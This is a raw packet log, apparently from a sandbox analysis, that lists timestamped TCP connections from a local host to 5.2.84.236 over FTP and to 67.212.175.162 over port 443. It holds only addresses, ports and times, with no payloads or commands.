Oct 4, 2024 10:41:22.280297041 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:22.285111904 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:22.526762009 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:22.527015924 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:22.531902075 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:22.746406078 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:22.746565104 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:22.751302958 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:22.965718985 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:22.965887070 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:22.970711946 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:23.185127974 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:23.185275078 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:23.190932989 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:23.406007051 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:23.406894922 CEST	49760	53494	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:23.411742926 CEST	53494	49760	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:23.411813974 CEST	49760	53494	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:23.412076950 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:23.416973114 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:24.033534050 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:24.038304090 CEST	49760	53494	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:24.038373947 CEST	49760	53494	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:24.043294907 CEST	53494	49760	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:24.043730974 CEST	53494	49760	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:24.043809891 CEST	49760	53494	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:24.099236012 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:24.258876085 CEST	21	49740	5.2.84.236	192.168.2.7
Oct 4, 2024 10:41:24.362152100 CEST	49740	21	192.168.2.7	5.2.84.236
Oct 4, 2024 10:41:25.175848961 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.175894976 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.176042080 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.186289072 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.186305046 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.688040972 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.688155890 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.691402912 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.691412926 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.691696882 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.740843058 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.744024038 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.787435055 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.865714073 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.865772963 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.865792990 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.865823984 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.865844965 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.865900993 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.889719009 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.889849901 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.889867067 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.943929911 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.952524900 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.952564001 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.952580929 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.952604055 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.952729940 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.953783035 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.953804016 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.953819990 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.953865051 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.953865051 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.954554081 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.954571009 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.954641104 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.954641104 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.976748943 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.976772070 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:25.976825953 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:25.976845026 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.057327032 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.057358027 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.057421923 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.057451010 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.057482958 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.057564974 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.057589054 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.057796001 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.057908058 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.057969093 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.058051109 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.058103085 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.058315039 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.058433056 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.058557987 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.058629036 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.058700085 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.058799982 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.064511061 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.064605951 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.065125942 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.065181017 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.065998077 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.066154957 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.066880941 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.067013025 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.067692995 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.067802906 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.068650007 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.068713903 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.069645882 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.069885969 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.070475101 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.070544958 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.071399927 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.071470022 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.071881056 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.071994066 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.072807074 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.072885990 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.073909998 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.074167013 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.075150013 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.075218916 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.075819969 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.075886011 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.076287031 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.076349020 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.077193975 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.077263117 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.078712940 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.078800917 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.078896999 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.078963041 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.079874992 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.080008984 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.080082893 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.080151081 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.080451965 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.080543995 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.080791950 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.080864906 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.081021070 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.081104994 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.081459999 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.081590891 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.081667900 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.081805944 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.081957102 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.082045078 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.082148075 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.082221031 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.082268000 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.082350016 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.082627058 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.082674980 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.082926035 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.082998991 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.083276033 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.083364010 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.083524942 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.083584070 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.083908081 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.084008932 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.084196091 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.084284067 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.084434032 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.084542036 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.085033894 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.085345030 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.085388899 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.085402012 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.085412025 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.085468054 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.085555077 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.085642099 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.085767984 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.085824013 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.086014986 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.086071968 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.086237907 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.086308002 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.086919069 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.087002993 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.087203026 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.087342978 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.087400913 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.087481022 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.087691069 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.087775946 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.087908030 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.087959051 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.088601112 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.088697910 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.088824987 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.088879108 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.089046001 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.089112043 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.089267969 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.089322090 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.090322971 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.090379000 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.090614080 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.090693951 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091027021 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.091108084 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091224909 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.091285944 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091404915 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.091495037 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091594934 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.091646910 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.091689110 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091689110 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091696978 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.091708899 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.091747046 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091757059 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.091772079 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091927052 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.091986895 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.092112064 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.092225075 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.092281103 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.092539072 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.092578888 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.092592955 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.092605114 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.092618942 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.092636108 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.092943907 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.092986107 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.092999935 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.093007088 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.093050003 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.093050003 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.093348026 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.093398094 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.093441010 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.093441010 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.093447924 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.093489885 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.093781948 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.093830109 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.093842983 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.093848944 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.093884945 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.093884945 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.094181061 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.094240904 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.094418049 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.094520092 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.094703913 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.094760895 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.094777107 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.094784975 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.094814062 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.094814062 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.095068932 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.095133066 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.095242023 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.095294952 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.095309973 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.095314980 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.095351934 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.095352888 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.095505953 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.095506907 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.095515966 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.095576048 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.096065998 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.096122980 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.096142054 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.096154928 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.096184969 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.096184969 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.096399069 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.096446991 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.096466064 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.096476078 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.096497059 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.096519947 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.096976042 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.097028017 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.097059011 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.097070932 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.097085953 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.097115993 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.097182989 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.097232103 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.097233057 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.097244024 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.097282887 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.097294092 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.097294092 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.097302914 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.097348928 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.097348928 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.098035097 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.098129034 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.098133087 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.098177910 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.098189116 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.098220110 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.098229885 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.098236084 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.098246098 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.098297119 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.098297119 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.098306894 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.098428011 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.099005938 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.099057913 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.099061966 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.099071026 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.099107027 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.099112988 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.099119902 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.099158049 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.099169970 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.099169970 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.099179029 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.099200010 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.099250078 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.099940062 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.099992037 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.099992037 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100003958 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100040913 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100054979 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.100089073 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.100095034 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100119114 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100138903 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.100138903 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.100147963 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100178957 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100189924 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.100189924 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.100198984 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100301027 CEST	49769	443	192.168.2.7	67.212.175.162
Oct 4, 2024 10:41:27.100936890 CEST	443	49769	67.212.175.162	192.168.2.7
Oct 4, 2024 10:41:27.100991964 CEST	443	49769	67.212.175.162	192.168.2.7
